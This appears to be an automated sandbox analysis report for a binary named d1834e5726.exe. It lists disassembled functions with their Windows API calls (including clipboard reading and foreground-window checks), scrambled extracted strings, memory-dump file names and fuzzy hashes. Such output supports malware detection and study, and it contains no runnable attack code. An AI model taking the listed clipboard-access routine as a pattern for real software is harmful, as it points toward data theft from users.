Opcode Fuzzy Hash: 41766b43f81166e623d3c3c60ff9773f9b872b3f8d1c88be4a6de2ff87d93f59
Instruction Fuzzy Hash: BA41A931900248EFCF11DF96C981AEE7BB5FF48305F1880AAFA0867291D3399D51CB58

Function 004E70B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(004FD900,0000000C), ref: 004E70CA
ExitThread.KERNEL32 ref: 004E70D1

Strings

f2N, xrefs: 004E7107

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ErrorExitLastThread
String ID: f2N
API String ID: 1611280651-3473888870
Opcode ID: a6929e294f63bf0fc63f3c935cc6b5765a48a12c6544121ece77d4954e0b2301
Instruction ID: e5499e37a5df0167cfa0d112ea412135bdaacc9748f0f3c350b30184e27580a4
Opcode Fuzzy Hash: a6929e294f63bf0fc63f3c935cc6b5765a48a12c6544121ece77d4954e0b2301
Instruction Fuzzy Hash: 51F0A4719002889FDB11EBB2D94AA7E3B74EF00716F10409EF10557292CF786901CB99

Function 004E99FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 004E9A3C

Strings

InitializeCriticalSectionEx, xrefs: 004E9A0C
f2N, xrefs: 004E9A2C

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx$f2N
API String ID: 2593887523-3968345832
Opcode ID: 56995567bebce5066005fec148e68fde1bc4700d8df847af94d426ae395a1f6f
Instruction ID: 5796170e23a566131090ab9c5b1cc6ca1491ae3ff999f14c186e6b4c5c656c69
Opcode Fuzzy Hash: 56995567bebce5066005fec148e68fde1bc4700d8df847af94d426ae395a1f6f
Instruction Fuzzy Hash: 8CE0923154025CBBCB216F42EC05EAE3F11DF40BA1F114032FE18251A1C67A4C21DBD9

Function 004E98FD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 004E9931

Strings

f2N, xrefs: 004E9927
FlsAlloc, xrefs: 004E990D

Memory Dump Source

Source File: 00000009.00000002.2627591947.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000009.00000002.2627572139.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627614361.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627635653.00000000004FE000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627655067.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2627673608.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4e0000_d1834e5726.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc$f2N
API String ID: 2773662609-3652087093
Opcode ID: 1a87bfdfcf120e5543bf76796374c97b2d3c2bec5e2bf8836ca4eb80aad2cf2f
Instruction ID: 41c02121851a7dbc20c9537618e039e99ee3877a906923dbdf3cad1d46ef026a
Opcode Fuzzy Hash: 1a87bfdfcf120e5543bf76796374c97b2d3c2bec5e2bf8836ca4eb80aad2cf2f
Instruction Fuzzy Hash: C6E0C27168426CB3C6207792AC06FBE7E44CB40B61B120037FE05212E28AAD1C2186EE

Analysis Process: d1834e5726.exePID: 6464, Parent PID: 5312COMMON

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15.4%
Total number of Nodes:	65
Total number of Limit Nodes:	9

Executed Functions

Function 0040A960 Relevance: 9.2, Strings: 7, Instructions: 401
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

n, xrefs: 0040A982
kl, xrefs: 0040AB2D
'D F, xrefs: 0040AAC6
#xDz, xrefs: 0040AACE
N[\D, xrefs: 0040AC00
N[\D, xrefs: 0040ADC0, 0040ACF6, 0040ABC5, 0040ADB7, 0040ADEE, 0040ACD2, 0040ABA4, 0040AD01
A|}~, xrefs: 0040AAD6

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: #xDz$'D F$A|}~$N[\D$N[\D$kl$n
API String ID: 0-490458541
Opcode ID: 873e877496f468c046363248420fa7ca63a51e9b47053ced3edd0b31dc018a30
Instruction ID: 966b8f91f76bb20883ed88500b6b89ab0c93423946d56f050922860fedc986fe
Opcode Fuzzy Hash: 873e877496f468c046363248420fa7ca63a51e9b47053ced3edd0b31dc018a30
Instruction Fuzzy Hash: D7C1267260C3504BC714CF6488905AFBBD3ABC2304F1E893DE9D56B382D679991AC78B

Function 004087F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408811
GetCurrentThreadId.KERNEL32 ref: 0040881A
GetForegroundWindow.USER32 ref: 004088CE
ExitProcess.KERNEL32 ref: 0040897B

Strings

YO9W, xrefs: 00408822

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID: CurrentProcess$ExitForegroundThreadWindow
String ID: YO9W
API String ID: 3118123366-386669604
Opcode ID: 81875feee291dd51c94163340b3786e966dc5896524b3e4d2eaf5977dbc455ff
Instruction ID: 5b12a659e8285d1355c3597aa5681aa9478bfa7506ef17589c1493984f4e9e7d
Opcode Fuzzy Hash: 81875feee291dd51c94163340b3786e966dc5896524b3e4d2eaf5977dbc455ff
Instruction Fuzzy Hash: 98315977F5061807C31C7AB98C4636AB5874BC4614F0F863E9DD9AB386FDB89C0442D9

Function 0043B480 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00409CC0 Relevance: 1.3, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\U^_, xrefs: 00409CE5

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: \U^_
API String ID: 0-352632802
Opcode ID: b233260ff75ba58cbb536c0014e0eb0df055bc4e14581868770786c388d706bb
Instruction ID: 5fa690bb4235e6f9a1b833386d74a381627e7adb8b1be8a89cbf23ee07b36487
Opcode Fuzzy Hash: b233260ff75ba58cbb536c0014e0eb0df055bc4e14581868770786c388d706bb
Instruction Fuzzy Hash: D011E23060C3808FD324DF3495549ABBBA5EFD7748F545A2CE4C56B281C735980A8FAA

Function 00434BDC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00434C09

Strings

t, xrefs: 00434C14

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID: DefaultLanguageUser
String ID: t
API String ID: 95929093-2238339752
Opcode ID: 3fa4c25dce8568a0724ebcbfa99840aa77e9227c5342f76fc488d9eef6af0589
Instruction ID: 08a8b9a0e37a212ebea7de5d04b95149eac63241ee44ff142c93878423301f38
Opcode Fuzzy Hash: 3fa4c25dce8568a0724ebcbfa99840aa77e9227c5342f76fc488d9eef6af0589
Instruction Fuzzy Hash: 53F0FF34808298CFDB10DF68D4943EEBBF16F66304F1880ACC08497382D37A9A84CB12

Function 0043B720 Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043B720
GetForegroundWindow.USER32 ref: 0043B740

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: a4781643aa2d8fd57512208f1c3e62aa4b8d5176cb57333a04816d28865289df
Instruction ID: 191facca889f69fa70601903ca8693053aaba1cbaba24685dbffd0b384c421fe
Opcode Fuzzy Hash: a4781643aa2d8fd57512208f1c3e62aa4b8d5176cb57333a04816d28865289df
Instruction Fuzzy Hash: 7ED0A7FDD20110EBC604AB71FC4A41B3A1AEB4722DB545539EC0343352DA39782E868F

Function 0043B420 Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B29B,?,00000001,?,?,?,?,?,?,?), ref: 0043B452

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c927d8c6f07db5a3335dd59de96673b47f735cea6f05c616f97ff7e83687720b
Instruction ID: a89ac6462aaa6a8a5f29c09ee71e481237a955995f4f3f89a98fbf9f2f2a6ed3
Opcode Fuzzy Hash: c927d8c6f07db5a3335dd59de96673b47f735cea6f05c616f97ff7e83687720b
Instruction Fuzzy Hash: FBE0E536904210EBD2002B357C06B177678EF9B715F060436F40152115D739E801C5DE

Function 00439B60 Relevance: 1.5, APIs: 1, Instructions: 15
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,00000000,00412F5C), ref: 00439B80

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d0720c9dfbe2666778a34d5469e5ae55c8d5964329e0fb1cba2b62a2f878fbc3
Instruction ID: 8d81dc3d2e1c71e2762f942217139477682170591cb2c618f1865e02491f5b7e
Opcode Fuzzy Hash: d0720c9dfbe2666778a34d5469e5ae55c8d5964329e0fb1cba2b62a2f878fbc3
Instruction Fuzzy Hash: 76D0C935505126EBCA506B28BC15BC73A989F4A671F0708A1B4006A075C765EC919AD8

Function 00439B40 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,00414E57,00000400), ref: 00439B50

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a95155655fbe3eb8f0e77a05497d8175f8be12db265ae77d37b3e7249a9ffdc4
Instruction ID: 3d340f236624c1ae318c051adf9ea47d82c8c11c3707c94fc3fa8f772c7fe72e
Opcode Fuzzy Hash: a95155655fbe3eb8f0e77a05497d8175f8be12db265ae77d37b3e7249a9ffdc4
Instruction Fuzzy Hash: 91C04831145224ABDA10AB15EC09B8A3AA8AF496A1F1A04A6B005660B28760AC929A98

Non-executed Functions

Function 00431BB0 Relevance: 47.4, APIs: 2, Strings: 25, Instructions: 179COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00431BF9
GetSystemMetrics.USER32 ref: 00431C09

Strings

S%C, xrefs: 00431E14
b(C, xrefs: 00431ECF
;(C, xrefs: 00431E4B
="C, xrefs: 00431DDD
, xrefs: 00431CF6
="C, xrefs: 00431E8D
="C, xrefs: 00431EC4
="C, xrefs: 00431EDA
&)C, xrefs: 00431EAE
#C, xrefs: 00431D7A
="C, xrefs: 00431E6C
="C, xrefs: 00431DA6
="C, xrefs: 00431E98
="C, xrefs: 00431E77
="C, xrefs: 00431E61
="C, xrefs: 00431EB9
="C, xrefs: 00431E1F
="C, xrefs: 00431DB1
="C, xrefs: 00431DBC
="C, xrefs: 00431DFE
="C, xrefs: 00431E09
="C, xrefs: 00431E2A
='C, xrefs: 00431D9B
="C, xrefs: 00431DD2
="C, xrefs: 00431EE5

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID: MetricsSystem
String ID: $&)C$;(C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$='C$S%C$b(C$#C
API String ID: 4116985748-628680385
Opcode ID: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
Instruction ID: ea45c71986b2e534ecec44a4126f62931ddcc8577b73b097e58ed3aa899a90b6
Opcode Fuzzy Hash: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
Instruction Fuzzy Hash: 41B16FB04097818FE771DF14D48879BBBE0BBC5308F508A2EE5E89B251CBB95448CF86

Function 00425920 Relevance: 12.9, Strings: 10, Instructions: 398COMMON

Download Yara Rule

Strings

cba`, xrefs: 00425C50
cba`, xrefs: 00425E6C
<b"d, xrefs: 004259AF
3v#H, xrefs: 004259D7
Z\, xrefs: 004259FF
=j9l, xrefs: 0042599F
z%|, xrefs: 004259BF
^P, xrefs: 00425A07
&f?x, xrefs: 004259B7
"r,t, xrefs: 004259CF

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: z%|$"r,t$&f?x$3v#H$<b"d$=j9l$cba`$cba`$Z\$^P
API String ID: 0-3047316687
Opcode ID: 45c83a3ddc5386c7eaecb6d0721308efe7616dc8ac7a87c6f5778f813dbd46f5
Instruction ID: 146473404e5499b4986dffa8d26f26e1c07bf5215faae6f3d7194190b628d0b4
Opcode Fuzzy Hash: 45c83a3ddc5386c7eaecb6d0721308efe7616dc8ac7a87c6f5778f813dbd46f5
Instruction Fuzzy Hash: C2D124B9608380DFE324DF15E88176BB7E1FBD5304F94982DE58587261D738D901CB4A

Function 004233A0 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 471COMMON

Download Yara Rule

Strings

$^<P, xrefs: 0042363F
]~"p, xrefs: 0042367F
VW, xrefs: 004233E5
ij, xrefs: 0042397D
#R,T, xrefs: 00423647
KM, xrefs: 004237FB

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: #R,T$$^<P$VW$]~"p$ij$KM
API String ID: 0-788320361
Opcode ID: 0ef6ac19612ecc2b18e822a80ca420e4bb8027dd0eadc437e0bac95af6737912
Instruction ID: 9ed236048ece28067beed024fb633757567cd4a7e3bca11c75bb2a7735f0e68b
Opcode Fuzzy Hash: 0ef6ac19612ecc2b18e822a80ca420e4bb8027dd0eadc437e0bac95af6737912
Instruction Fuzzy Hash: D1F1CAB46083509FD310DF65E88262BBBF1EFD5304F44892DE4958B351EB789A06CB4B

Function 00431A30 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00431A40
GetWindowLongW.USER32 ref: 00431A65
GetClipboardData.USER32 ref: 00431A75
GlobalLock.KERNEL32 ref: 00431A8E
GlobalUnlock.KERNEL32 ref: 00431B90
CloseClipboard.USER32 ref: 00431B99

Strings

K, xrefs: 00431B1E

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: K
API String ID: 2832541153-856455061
Opcode ID: 027abc228ed841da0674a97a3735ab7f080d79d715808bd082ae78d0cbe3e8e1
Instruction ID: 513562b2ac7e6d1d4712994eff6d7c1bc04b9d90a7c3137532ed1f51a9abc6ba
Opcode Fuzzy Hash: 027abc228ed841da0674a97a3735ab7f080d79d715808bd082ae78d0cbe3e8e1
Instruction Fuzzy Hash: 34418E6150C7818ED310AF7C988826FBFE09B96224F044A6EE8E5872D2E6389549C797

Function 004296D8 Relevance: 9.1, Strings: 7, Instructions: 340COMMON

Download Yara Rule

Strings

;>*2, xrefs: 004299CE
);?g, xrefs: 004299EE
fa, xrefs: 004299F6
='0{, xrefs: 004299DE
[93=, xrefs: 004299E6
cba`, xrefs: 0042974C
9nI9, xrefs: 004299D6

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: );?g$9nI9$;>*2$='0{$[93=$cba`$fa
API String ID: 0-154584671
Opcode ID: 3e51a02978bc99ce7d016768a4801fe2a924607298026115374562d3702a8947
Instruction ID: 21be1e4f2e6752f9380b4aadbcf4cd787e7e0f4b09ea5b297d7e9ef9a1fb0c4b
Opcode Fuzzy Hash: 3e51a02978bc99ce7d016768a4801fe2a924607298026115374562d3702a8947
Instruction Fuzzy Hash: 3FC1077560C3A08FC3118F29D89066BBBE2AF96310F588A6DF4E1573D2C7398D45CB5A

Function 00419C10 Relevance: 8.8, Strings: 6, Instructions: 1297COMMON

Download Yara Rule

Strings

cba`, xrefs: 0041AA31
wEtG, xrefs: 00419F94
PQ, xrefs: 00419FAC
I,~M, xrefs: 0041AA47
cba`, xrefs: 00419C63
cba`, xrefs: 0041A13D

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID: InitializeThunk
String ID: I,~M$PQ$cba`$cba`$cba`$wEtG
API String ID: 2994545307-3803835663
Opcode ID: 47063c938c01330124c9dc59b6d375a3b8a360990f39732c0e3748d67b9dcd4f
Instruction ID: ce701afe96e54189f6fff091c8333c98f5ae15aa60c98f01a083bef101dadeb2
Opcode Fuzzy Hash: 47063c938c01330124c9dc59b6d375a3b8a360990f39732c0e3748d67b9dcd4f
Instruction Fuzzy Hash: C59235746093409FE714CF65D891B6BBBE2EBD5300F28882EE58487391D7799C81CB9B

Function 0042D085 Relevance: 6.6, Strings: 5, Instructions: 368COMMON

Download Yara Rule

Strings

#, xrefs: 0042D4AC
P, xrefs: 0042D554
AGsW, xrefs: 0042D496
k, xrefs: 0042D4B6
0, xrefs: 0042D430

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: #$0$AGsW$P$k
API String ID: 0-1629916805
Opcode ID: a92c176f258902a07af39c1f8e4a41f6c7503ef90e7a1abad74dc0064dca0dbd
Instruction ID: 8816b6b3b95a3b8c405e0a0f8c285763547ceed8af8c8b555c70c7a9f783aa76
Opcode Fuzzy Hash: a92c176f258902a07af39c1f8e4a41f6c7503ef90e7a1abad74dc0064dca0dbd
Instruction Fuzzy Hash: 1CC1F4317183918ED328CF39D4513ABBBD2AFD2304F68866ED4D58B2D1D6798449C71B

Function 0040CE55 Relevance: 6.5, Strings: 5, Instructions: 275COMMON

Download Yara Rule

Strings

z@(, xrefs: 0040CF5B
N~ :, xrefs: 0040CF45
F^, xrefs: 0040D0B9
VgfW, xrefs: 0040CF2F
I@, xrefs: 0040D0C4

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: F^$I@$N~ :$VgfW$z@(
API String ID: 0-3506082874
Opcode ID: 01845d3766adc81aa739c5ea8dbca92eb081da4d73060a58daa09bb76f621cb6
Instruction ID: b1d760c26d9b90ec4573806c6615211f8657e28aa76e89aec63d6860f5017e85
Opcode Fuzzy Hash: 01845d3766adc81aa739c5ea8dbca92eb081da4d73060a58daa09bb76f621cb6
Instruction Fuzzy Hash: A191EEB05083C18BD335CF25D8A0BEBBBE0AB96314F148D6DD4DD9B282D738454ACB96

Function 0040C36E Relevance: 6.5, Strings: 5, Instructions: 203COMMON

Download Yara Rule

Strings

CJ, xrefs: 0040C67E
4cde, xrefs: 0040C79C
){+}, xrefs: 0040C788
GS, xrefs: 0040C677
F'k), xrefs: 0040C706

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: ){+}$4cde$CJ$F'k)$GS
API String ID: 0-4192230409
Opcode ID: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
Instruction ID: 6afdb2316fdadaf12e32bd698f1912d34734f08b0bc4a82971b76fff6b28e520
Opcode Fuzzy Hash: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
Instruction Fuzzy Hash: 50B11BB84053058FE354DF629688FAA7BB0FB25310F1A82E9E0992F776D7748405CF96

Function 00415ADC Relevance: 5.4, Strings: 4, Instructions: 398COMMON

Download Yara Rule

Strings

WL, xrefs: 00415C75
^Q, xrefs: 00415C83
1/3T, xrefs: 0041611F
neA, xrefs: 00415ECE

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: 1/3T$WL$^Q$neA
API String ID: 0-3205570823
Opcode ID: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
Instruction ID: 36620dcd79f832a97b090e2ed89ea61b800e286945c25bf48684ec17d430fe28
Opcode Fuzzy Hash: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
Instruction Fuzzy Hash: A9D1CEB4100B01CFD7258F25C8A1BA3BBB1FF86314F19858DC8964F7A2D779A855CB94

Function 00426170 Relevance: 5.3, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

4zVc, xrefs: 0042621C
8zVc, xrefs: 0042627D
cba`, xrefs: 004261C1
YNMZ, xrefs: 00426446

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID: InitializeThunk
String ID: 4zVc$8zVc$YNMZ$cba`
API String ID: 2994545307-1799417857
Opcode ID: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
Instruction ID: a4538a0261ff6c2ac210d57fc6ac5424e6a326b8b8d8802f404cc31a7d59ec03
Opcode Fuzzy Hash: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
Instruction Fuzzy Hash: 189147B2F042208BD724DA25EC8172B7292EBD1314F5A857EEC8597342E678AC00C7DA

Function 00420717 Relevance: 3.4, Strings: 2, Instructions: 854COMMON

Download Yara Rule

Strings

B:@<, xrefs: 00420D02
F>?0, xrefs: 00420D09

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: B:@<$F>?0
API String ID: 0-4011826714
Opcode ID: db013f8bcd791390b44068821e0592b044049136823266e2a0b8e4940e29ff84
Instruction ID: 92ed06d7aa227fc4673e4b6d33fedd1ff2714f2f2b1d0eb8acbab6dee258af69
Opcode Fuzzy Hash: db013f8bcd791390b44068821e0592b044049136823266e2a0b8e4940e29ff84
Instruction Fuzzy Hash: E43256B1A00721CBCB24CF24C892267BBB1FF92310F59825DD8825F796E779A851CBD5

Function 0042C6D7 Relevance: 3.1, Strings: 2, Instructions: 614COMMON

Download Yara Rule

Strings

', xrefs: 0042CC09
iJ, xrefs: 0042CAF5

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: '$iJ
API String ID: 0-30662343
Opcode ID: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
Instruction ID: e8033de2897f6a471e39d6e72682695b514e130b01bc458e21cc2d5cc8d806b0
Opcode Fuzzy Hash: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
Instruction Fuzzy Hash: 7C02F57060C3E18FD7298F2990A03ABBFE1AF97304F58496ED4D997342D77984058B97

Function 00414F08 Relevance: 3.1, Strings: 2, Instructions: 609COMMON

Download Yara Rule

Strings

cba`, xrefs: 00415565
=UA, xrefs: 0041551C, 00415537

Memory Dump Source

Source File: 0000000B.00000002.2698258781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_d1834e5726.jbxd

Similarity

API ID:
String ID: =UA$cba`
API String ID: 0-2849403845
Opcode ID: ac233faae9877bc3ddc3a70347ef5b8a5b0ef2ad5a4fd7cdd570c427d15c7cae
Instruction ID: b0755fcd4efdf1967727a5f4be91126eb1e252dcdfc562f5600afc0ab194aa5f
Opcode Fuzzy Hash: ac233faae9877bc3ddc3a70347ef5b8a5b0ef2ad5a4fd7cdd570c427d15c7cae
